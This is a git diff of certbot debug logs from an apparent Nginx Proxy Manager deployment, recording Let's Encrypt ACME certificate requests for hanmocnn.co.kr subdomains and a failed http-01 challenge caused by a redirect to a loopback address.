||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZndTMEdIT3VoMHA1b1owZFgyLWgxY2R2a1VtemNqM1VFUkwyZXlCNlRJczAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzgyODA0MDk2In0",
|
||||||
|
"signature": "Zyy-7On6I9OdwGJpo2gHLS2PkXfFYhqYyZ-6RBwPSYT4asuCiGrlDs8Zf5hfClpQUCuL9gPUZJyBBsMrfcELAyc-1Mhs-0Y60R5JxzDJM_Oe64ii_fNtOk5RhMNvhhtHL6wOpVPgqJbu6NOD1LoEwZnI95or3cQrnA5JLgXlFIH4e627oXP9FzadbEnE2ppHSHEOE-e8tJf2brEtX3hpppUW0pvvQ5TXOXk5Hzb4GelRYRgtPtJ1h-akA8imuF1_ToaZ9hme9x8dOFwITbS69CvNXLbFCZZMpVy6ABebZmIdueP96v6yOurRMhiU6sSwsm2aqY4m-hzAeXDy7QYYIQ",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:30:13,060:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658782804096 HTTP/1.1" 200 827
|
||||||
|
2026-02-14 23:30:13,061:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:30:12 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 827
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: QkEzerAfFYA0_fEXrf2D_r6CSK-4QmrHn-QLIJngeuotvq0WOCA
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:30:11Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/Xat64Q",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:30:13,061:DEBUG:acme.client:Storing nonce: QkEzerAfFYA0_fEXrf2D_r6CSK-4QmrHn-QLIJngeuotvq0WOCA
|
||||||
|
2026-02-14 23:30:13,062:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/mKxvxg', 'status': 'pending', 'token': 'RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA'}
|
||||||
|
2026-02-14 23:30:16,062:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:30:16,067:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658782804096:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZkZZQTBfZkVYcmYyRF9yNkNTSy00UW1ySG4tUUxJSm5nZXVvdHZxMFdPQ0EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzgyODA0MDk2In0",
|
||||||
|
"signature": "gzMSYR18ejGBOZMJuA6MIORDbmiGpx9s4x0SWUt-BiFracrk8MfKiEwQOk3cRTyvIRHxi6RQlTjsL1AB68tDcBBnjjjGwHEfbB4VB_OiMR--W36m2ryAFlgK_RhFbSBme2YhlvrY2wwXDbXLGi50IS0LPytBMNSAwnjbrdv1ivOTe9ghkUB0nhhTQhMRH-ZtyCrjR9y79JOpOFlMoQ_BtUtA6GcGhbGt14R5W-YCDCHz8XR44MddbE0Pg9QfoEkPYtLID5X_MAqtLyzvP6NegFkDnoO_vGzzVBT1sqQBZ1IWBoxVFY-B8KvO9IE6j87PKo5Zya61nKP2WhSCKpurMQ",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:30:16,242:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658782804096 HTTP/1.1" 200 1062
|
||||||
|
2026-02-14 23:30:16,243:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:30:16 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 1062
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: qLPTsdtfYJSp6SSecxA1fczj1GIvYcegdMBqoPT9DzT4CCKVwMA
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "invalid",
|
||||||
|
"expires": "2026-02-21T23:30:11Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658782804096/VH-LuQ",
|
||||||
|
"status": "invalid",
|
||||||
|
"validated": "2026-02-14T23:30:11Z",
|
||||||
|
"error": {
|
||||||
|
"type": "urn:ietf:params:acme:error:connection",
|
||||||
|
"detail": "211.49.97.59: Fetching http://127.0.0.1: Invalid host in redirect target: IP address is in a reserved address block: [RFC1122], Section 3.2.1.3: Loopback",
|
||||||
|
"status": 400
|
||||||
|
},
|
||||||
|
"token": "RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA",
|
||||||
|
"validationRecord": [
|
||||||
|
{
|
||||||
|
"url": "http://mail.hanmocnn.co.kr/.well-known/acme-challenge/RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA",
|
||||||
|
"hostname": "mail.hanmocnn.co.kr",
|
||||||
|
"port": "80",
|
||||||
|
"addressesResolved": [
|
||||||
|
"211.49.97.59"
|
||||||
|
],
|
||||||
|
"addressUsed": "211.49.97.59"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:30:16,243:DEBUG:acme.client:Storing nonce: qLPTsdtfYJSp6SSecxA1fczj1GIvYcegdMBqoPT9DzT4CCKVwMA
|
||||||
|
2026-02-14 23:30:16,243:INFO:certbot._internal.auth_handler:Challenge failed for domain mail.hanmocnn.co.kr
|
||||||
|
2026-02-14 23:30:16,243:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='mail.hanmocnn.co.kr')
|
||||||
|
2026-02-14 23:30:16,243:DEBUG:certbot._internal.display.obj:Notifying user:
|
||||||
|
Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems:
|
||||||
|
Identifier: mail.hanmocnn.co.kr
|
||||||
|
Type: connection
|
||||||
|
Detail: 211.49.97.59: Fetching http://127.0.0.1: Invalid host in redirect target: IP address is in a reserved address block: [RFC1122], Section 3.2.1.3: Loopback
|
||||||
|
|
||||||
|
Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet.
|
||||||
|
|
||||||
|
2026-02-14 23:30:16,244:DEBUG:certbot._internal.error_handler:Encountered exception:
|
||||||
|
Traceback (most recent call last):
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations
|
||||||
|
self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort)
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations
|
||||||
|
raise errors.AuthorizationError('Some challenges have failed.')
|
||||||
|
certbot.errors.AuthorizationError: Some challenges have failed.
|
||||||
|
|
||||||
|
2026-02-14 23:30:16,245:DEBUG:certbot._internal.error_handler:Calling registered functions
|
||||||
|
2026-02-14 23:30:16,245:INFO:certbot._internal.auth_handler:Cleaning up challenges
|
||||||
|
2026-02-14 23:30:16,245:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/RSEU60MSBc_wZ05OGP5aMa5m2u0Zzbe002agGddSLBA
|
||||||
|
2026-02-14 23:30:16,245:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
|
||||||
|
2026-02-14 23:30:16,246:DEBUG:certbot._internal.log:Exiting abnormally:
|
||||||
|
Traceback (most recent call last):
|
||||||
|
File "/opt/certbot/bin/certbot", line 6, in <module>
|
||||||
|
sys.exit(main())
|
||||||
|
^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main
|
||||||
|
return internal_main.main(cli_args)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1886, in main
|
||||||
|
return config.func(config, plugins)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1598, in certonly
|
||||||
|
lineage = _get_and_save_cert(le_client, config, sans, certname, lineage)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 143, in _get_and_save_cert
|
||||||
|
lineage = le_client.obtain_and_enroll_certificate(sans, certname)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 533, in obtain_and_enroll_certificate
|
||||||
|
cert, chain, key, _ = self.obtain_certificate(sans)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 434, in obtain_certificate
|
||||||
|
orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 512, in _get_order_and_authorizations
|
||||||
|
authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations
|
||||||
|
self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort)
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations
|
||||||
|
raise errors.AuthorizationError('Some challenges have failed.')
|
||||||
|
certbot.errors.AuthorizationError: Some challenges have failed.
|
||||||
|
2026-02-14 23:30:16,248:ERROR:certbot._internal.log:Some challenges have failed.
|
||||||
608
npm/data/logs/letsencrypt.log.5
Normal file
608
npm/data/logs/letsencrypt.log.5
Normal file
@@ -0,0 +1,608 @@
|
|||||||
|
2026-02-14 22:59:02,196:DEBUG:certbot._internal.main:certbot version: 5.3.0
|
||||||
|
2026-02-14 22:59:02,197:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
|
||||||
|
2026-02-14 22:59:02,197:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-2', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'asset.hanmocnn.co.kr']
|
||||||
|
2026-02-14 22:59:02,197:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
|
||||||
|
2026-02-14 22:59:02,211:DEBUG:certbot._internal.log:Root logging level set at 30
|
||||||
|
2026-02-14 22:59:02,212:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-14 22:59:02,213:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
|
||||||
|
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
|
||||||
|
Interfaces: Authenticator, Plugin
|
||||||
|
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
|
||||||
|
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffff82545850>
|
||||||
|
Prep: True
|
||||||
|
2026-02-14 22:59:02,213:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffff82545850> and installer None
|
||||||
|
2026-02-14 22:59:02,213:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
|
||||||
|
2026-02-14 22:59:02,445:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
|
||||||
|
2026-02-14 22:59:02,447:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
|
||||||
|
2026-02-14 22:59:02,450:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
|
||||||
|
2026-02-14 22:59:02,976:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
|
||||||
|
2026-02-14 22:59:02,977:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:02 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 1033
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"cljAeBYjZ0g": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
|
||||||
|
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
|
||||||
|
"meta": {
|
||||||
|
"caaIdentities": [
|
||||||
|
"letsencrypt.org"
|
||||||
|
],
|
||||||
|
"profiles": {
|
||||||
|
"classic": "https://letsencrypt.org/docs/profiles#classic",
|
||||||
|
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
|
||||||
|
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
|
||||||
|
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
|
||||||
|
},
|
||||||
|
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
|
||||||
|
"website": "https://letsencrypt.org"
|
||||||
|
},
|
||||||
|
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
|
||||||
|
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
|
||||||
|
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
|
||||||
|
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
|
||||||
|
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:02,978:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for asset.hanmocnn.co.kr
|
||||||
|
2026-02-14 22:59:02,983:DEBUG:acme.client:Requesting fresh nonce
|
||||||
|
2026-02-14 22:59:02,983:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
|
||||||
|
2026-02-14 22:59:03,142:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
|
||||||
|
2026-02-14 22:59:03,142:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:03 GMT
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: 4AH-2vvB1NQKZWcJ22HFe1FZKhiyJu9QRwMnohd6vOI912fg_tI
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
|
||||||
|
2026-02-14 22:59:03,143:DEBUG:acme.client:Storing nonce: 4AH-2vvB1NQKZWcJ22HFe1FZKhiyJu9QRwMnohd6vOI912fg_tI
|
||||||
|
2026-02-14 22:59:03,143:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "asset.hanmocnn.co.kr"\n }\n ]\n}'
|
||||||
|
2026-02-14 22:59:03,149:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QjFOUUtaV2NKMjJIRmUxRlpLaGl5SnU5UVJ3TW5vaGQ2dk9JOTEyZmdfdEkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
|
||||||
|
"signature": "Cia2CAWpEnKE6nmYpWaxkKmDemJ8nir20XHQA5qOB5uajnyQG8z_f9DYWFgfyXg1I3fOolmBCtFk3vYohJZWNLJu-37JWsUUxW9YYjiGRvnOgAAzBZ9yKNaf8fVxyl-6IFYN1sYcksvjZ8xPMa4gpJi7HFPeTupLp7twmLXmEUlCwCEQVZsKTi3RyVDGJ3cakSYBWxSog2oPAyahHnw5qgqVBD9u-aILs5jZ3VmR2dJrQL3NNOSD5btMIt64jghNAD2cAbZL5FBbr2IdBx_WXCQ0S6X9cxHGSnyfMC9x2-GDQIBoRlSZ8kzHKtPRpAKeqm7v4QmXkpzdkdlO2USf8g",
|
||||||
|
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImFzc2V0Lmhhbm1vY25uLmNvLmtyIgogICAgfQogIF0KfQ"
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:03,327:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 354
|
||||||
|
2026-02-14 22:59:03,328:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 201
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:03 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 354
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606
|
||||||
|
Replay-Nonce: 4AH-2vvBInvPnj6082NjF7VfMGVMq5rvdAk0tdUzHfk2LBQiN_U
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T22:59:03Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "asset.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606"
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:03,328:DEBUG:acme.client:Storing nonce: 4AH-2vvBInvPnj6082NjF7VfMGVMq5rvdAk0tdUzHfk2LBQiN_U
|
||||||
|
2026-02-14 22:59:03,328:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:59:03,333:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QkludlBuajYwODJOakY3VmZNR1ZNcTVydmRBazB0ZFV6SGZrMkxCUWlOX1UiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0",
|
||||||
|
"signature": "jsBiP_GinWoex0fg3-Cdea-VuKuiTqzQnoZwpkLhn9rxAkYe6vmD2P6rY4u9tgtr-Ln-z6-Y0whY1jMYThfea6ncRWvgmaw2w520eoGFPda-InNb0JWJ5XHM93ItsdYs228hM1EB8EUTq-ARcB2LhXxaiuUK3kFOFmoln9Ekfo0Ow53-wG-roUIuAEwG2FtX8J_oxn-1fzm7FURWyV2oZLrDBQLtk05flxl7YbftjHKW1e0ukuC-1yiTmDr1ABIVCffIrU6gr_oKXL6IWObVfjIWWEgqXSpMH7HFtW5Kql73qjaarl-Tyz86POly2UQHtitudZ7xX0OYnbDZMRFDyw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:03,495:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 828
|
||||||
|
2026-02-14 22:59:03,496:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:59:03 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 828
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: NeKnt8TGeS1KvxtCH01Kudwai4J_7cvf6w6TlwiwGz_1lyO0dIQ
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "asset.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T22:59:03Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/ZQcSng",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 22:59:03,496:DEBUG:acme.client:Storing nonce: NeKnt8TGeS1KvxtCH01Kudwai4J_7cvf6w6TlwiwGz_1lyO0dIQ
|
||||||
|
2026-02-14 22:59:03,497:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA', 'status': 'pending', 'token': '_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs'}
|
||||||
|
2026-02-14 22:59:03,497:INFO:certbot._internal.auth_handler:Performing the following challenges:
|
||||||
|
2026-02-14 22:59:03,497:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='asset.hanmocnn.co.kr')
|
||||||
|
2026-02-14 22:59:03,497:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
|
||||||
|
2026-02-14 22:59:03,498:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
|
||||||
|
2026-02-14 22:59:03,499:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs
|
||||||
|
2026-02-14 22:59:03,500:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{}'
|
||||||
|
2026-02-14 22:59:03,504:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2VTMUt2eHRDSDAxS3Vkd2FpNEpfN2N2ZjZ3NlRsd2l3R3pfMWx5TzBkSVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2L2JXWS10ZyJ9",
|
||||||
|
